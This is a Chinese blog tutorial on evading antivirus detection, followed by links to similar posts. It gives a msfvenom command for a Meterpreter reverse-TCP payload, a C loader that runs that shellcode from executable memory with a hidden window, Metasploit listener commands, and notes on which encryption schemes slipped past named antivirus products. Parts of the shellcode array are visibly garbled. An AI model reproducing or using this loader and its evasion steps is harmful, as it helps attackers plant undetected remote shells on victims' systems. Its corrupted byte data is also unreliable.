免杀学习(1)

最新推荐文章于 2024-06-17 17:04:42 发布
最新推荐文章于 2024-06-17 17:04:42 发布
阅读量208 收藏
点赞数
分类专栏: 免杀 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/128528797
版权

0x00前言

shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名,(百度百科),简单理解就是一段漏洞利用代码。正常来说对服务器上传木马时,都会考虑一个问题,就是绕过杀毒软件的问题,也就是免杀问题

0x01涉及技术

shellcode混淆加密,无文件落地,分离拆分,白名单,DLL加载,Syscall,加壳加花,
资源修改,特征修改,二次开发CS,内存休眠,进程注入,反沙盒,反调试,CDN解析

0x02 shellcode分析

cs/msf 生成shellcode时,要看清架构,是x86还是x64。

用vs2019编辑shellcode时,注意选择的架构,还有最好选择release模式(生成exe模式,所有需要的东西都打包了),但如果选择debug模式,可能会出现dll缺失,执行失败。

 

杀毒软件、态势感知平台,如何知道msf/cs生成的木马所外联的ip和端口?

用msf生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp  lport=6688  lhost=xxx    -f c

将下方代码复制到1.c中

 

1.c代码,生成project3.exe程序,没选择时架构选x86

#include <Windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口


unsigned char buf[] = 
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x31\xff\x0f\xb7\x4a\x26"
"\x31\xc0\xac\\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x8b\x52\x10\x8b\x42\x3c\x57\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x58\x20\x01\xd3\x50\x8b\x48\x18"
"\x85\xc9\x74\x3c\x49\x31\xff\x8b\x34\x8b\x01\xd6\x31\xc0\xc1"
"\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
"\x07\x8929\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x65\x2a\xb1\xe8\x68\x02"
"\x00\x1a\x20\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
"\x68\x02\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
"\x40\x00\x00\xf\x0f\x30\xff\xd5\x57\x68"
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff"
"\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb"
"\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";





int main()

{
	//shellcode运行的几种方式

	//((void(WINAPI*)(void))&buf)();

	char* Memory;
	Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(Memory, buf, sizeof(buf));
	((void(*)())Memory)();

	//__asm {
	//lea eax,buf
	//call eax
	//}

	//__asm{
	//mov eax, offset buf
	//_emit 0xFF
	//_emit 0xE0
	//}

}

 msf配置监听器,并运行project3.exe,连接成功

msfconsole

 use multi/handler

set payload windows/x64/meterpreter/reverse_tcp

 set lport 6688
set lhost 0.0.0.0
run

分析shellcode,打开官方文档,查找ip和端口

把shellcode逆向,用ollydbg打开,call eax,自动步入,解码后就是16进制后的IP和端口,要隐藏IP

 

 

 0x03 shellcode混淆加密

Xor Aes Hex Rc4 等,前面的两种基本上是绕不过杀毒软件的,还有就是改用其他的回调函数,这个基本上也是绕不过的

hex加密

cs生成payload.bin

 

打开shellloader

cmd

LoaderMaker.exe payload.bin k.exe

运行k.exe,成功上线 ,xor,hex绕过某融,某defender失败

换回调方法,生成exe失败

rc4可以绕过某融,某defender,需要将shellcode加密两次

mushangqiujin
关注
专栏目录
免杀学习1
m0_55772907的博客
10-17 438
免杀
学习免杀技术请从下面开始
瞎几把学
08-25 847
 1.基础的汇编语言2.修改工具(不指那些傻瓜式软件)。如:OllyDbg . PEditor. C32ASM . MYCCL复合特征码定位器。UE .OC. 资源编辑器等。还有一些查壳 脱壳软件(如:PEID RL脱壳机等) . 以下是常用的几种免杀方法及工具:一、要使一个木马免杀首先要准备一个不加壳的木马,这点非常重要,否则 免杀操作就不能进行下去。 然后我们要木马的内存免杀
免杀学习
u010945925的专栏
07-14 691
杀毒软件查杀原理 要进行免杀,首先要知道杀毒软件是怎样把你的程序鉴定为病毒,才能够找到正确的方法进行免杀工作。杀毒软件一般根据下面几种方法进行查杀: 1.      特征码: 杀毒软件通过提取已有病毒中的一些特征二进制码,并将该特征码保存在病毒库中,查杀时再将其与被查杀程序一一比较,如果找到这些特征码,被查杀程序将被鉴定为病毒。杀软保存的特征码一般包括两部分:一段二进制码和这段特征码所在偏移
免杀实战知识汇总~
Ms08067安全实验室
09-21 530
“第二期”2022.9.30开班第二期新增:除了对课程进行了优化,另增加了2节课,免杀实战中的常见技法,dll文件及编写和反沙盒和反调试机制;常见的恶意代码中的加壳和常见的恶意代码中的脱壳。免杀,wiki百科:反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀...
免杀学习-基础学习
weixin_41489908的博客
12-15 1704
女孩可以在社会上遇到比在学校更优秀的男生,而男生在社会上或许再也遇不到比学校里更优秀的女生了。。。 ---- 网易云热评 一、名词解释 单从汉语“免杀”的字面意思来理解,可以将其看为一种能使病毒木马避免被杀毒软件查杀的技术。但是不得不客观地说,免杀技术的涉猎面非常广,您可以由此轻松转型为反汇编、逆向工程甚至系统漏洞的发掘等其他顶级黑客技术,由此可见免杀并不简单。免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus..
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1】 在网络安全领域,绕过反病毒软件(AV)的检测,即“免杀”技术,是一项重要的技能。本文将探讨如何利用Python来加载和执行shellcode,同时尽...
免杀学习.zip
10-06
免杀学习主要关注如何让恶意代码避开反病毒软件的检测,以便在目标系统中成功运行。在这个领域,理解和掌握免杀技术对于网络安全专家来说至关重要,因为这能帮助他们更好地防范和应对潜在的威胁。 文件...
65.远控免杀专题(65)-shellcode免杀实践1
08-03
【网络安全Web安全专题——免杀技术解析】 在网络安全领域,免杀技术是黑客和安全研究人员用来规避反病毒软件检测的重要手段。本文主要探讨的是如何通过不同的方法实现shellcode(一段可以直接由CPU执行的机器码...
白加黑免杀教程,很优秀的教程
03-06
录像1.exe可能是这个教程中演示的一个实例,它可能包含了一个免杀技术的实际应用。学习此类教程需要谨慎,因为非法使用这些技术可能会触犯法律。如果你是一名网络安全专业人士,了解这些技术可以帮助你更好地理解...
免杀入门学习---------2019.8.27
ins_Digger的博客
08-27 905
写一个啃书记录,写一下知识点和自己的理解。 peace! (主要是图书馆借的书不能圈圈画画,我也不想动笔,写一下博客挺好的。) 这篇随笔的大部分内容来自《黑客免杀攻防》 第一章说的免杀的历史,点了一下免杀和Rootkit的区别。 Rootkit的词条介绍 当然,一个菜鸟怎么会理解呢,只能默默地记一下,接受了。 第二章 免杀基础知识 罗列一下个人觉得比较重要的点: 1.基于文件扫描的反病毒技术 ...
免杀入门(基础理论)
NZXHJ的博客
09-14 2939
免杀入门的理论相关学习笔记
TideSec远控免杀学习三(Venom+Shellter)
fa1lr4in的小博客
02-11 1437
参考链接: 利用meterpreter下的Venom免杀后门:https://www.cnblogs.com/wh4am1/p/7469625.html 免杀后门venom :https://www.ggsec.cn/venom.html msf免杀及后渗透技术:https://bbs.ichunqiu.com/thread-49618-1-1.html Venom Venom和Veil...
免杀基本知识,shellcode混淆免杀
最新发布
白帽子凯哥聊黑客
06-17 1392
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
【网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
04-14 2719
目录一、免杀的概念二、免杀系统搭建三、免杀工具介绍1、myccl2、C32asm3、OD4、LordPE5、ImportREC6、VC++6.0/visual studio7、数字签名四、关于杀软排名不分前后1、360。2、金山毒霸3、江民4、瑞星5、安天防线6、卡巴斯基7、NOD328、诺顿9、小红伞,木伞10、BD五、杀软的查杀方法1、最基础的查杀2.1、静态启发式2.2、动态启发式3、HIPS4、云安全六、免杀方面的术语1、API2、花指令3、输入表4、区段5、加壳6、反启发7、隐藏输入表什么是免杀
远控免杀从入门到实践(2)工具总结篇
weixin_46236101的博客
03-13 2605
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实.
cs通过生成Payload上线(Powershell的两种上线方式)
久恙502的博客
01-14 1044
两种模式下的不同上线方法
CS渗透2-简单的监听&payload
冬萍子癸水
05-06 1564
这次非常简单,没有mian杀,纯粹是熟悉理解简单的流程。又开了台win7虚拟机做靶机。 cs客户端打开监听 左下角。add创造监听 主机IP填写服务端的ip,因为shell是经过服务端,再转到团队里每个人的客户端。端口填空闲的。靶机是win7,payload用自带的。所以用这个beacon http reverse 提示成功。现在攻击生成backdoor恶意文件。 因为是win7 64位所以...
Cobaltstrike系列教程(二)Listner与Payload生成
热门推荐
J0o1ey Blog
08-01 1万+
0x000-前文 Cobaltstrike系列教程(一)简介与安装 https://bbs.ichunqiu.com/thread-52937-1-1.html PS:原本想完成日更目标的,但昨天在研究无线,就没更,今天加班~ 0x001-Listner(监听器)介绍 ①Cobaltstrike listner简介 可能有一些小白并不理解什么叫做listner,在此科普一下。 Listner(监...
内存
weixin_30657999的博客
03-07 118
一. 虚拟内存 n api详解: 分配: n VirtualAlloc n VirtualAllocEx n VirtualAllocExNuma n 释放 n VirtualFree n VirtualFreeEx 实际上就是动态内存分配, 和c语言的malloc不同, 分配后数据清0,释放后数据清空成? 分配,调拨,释放: char* start =(...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值